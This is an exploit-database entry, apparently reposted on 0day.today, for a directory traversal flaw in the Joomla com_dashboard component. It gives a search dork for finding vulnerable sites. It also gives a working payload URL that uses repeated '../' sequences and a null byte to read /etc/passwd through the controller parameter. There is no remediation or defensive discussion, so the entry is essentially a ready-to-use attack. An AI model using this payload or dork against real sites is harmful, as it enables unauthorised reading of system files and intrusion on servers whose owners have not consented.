id: 10655
date: 01/10/2010
title: Joomla Component com_dashboard Directory Traversal
author: Fl0riX
cves: 

==================================================
Joomla Component com_dashboard Directory Traversal
==================================================

@~~=======================================~~@
@~~=Script : Joomla Component com_dashboard
 
@~~=Author : FL0RiX
 
@~~=Greez : Dost mu var?
 
@~~=Bug Type : Directory Traversal
 
@~~=Dork : inurl:"com_dashboard"
 
@~~=Note: Kimseye Hakettiginden Fazla Deger Vermeyeceksin.
 
@~~=======================================~~@
 
@~~=Vuln.
 
: http://site/ [Yol] /index.php?option=com_dashboard&controller=../../../../../../../etc/passwd%00



#  0day.today [2023-03-22]  #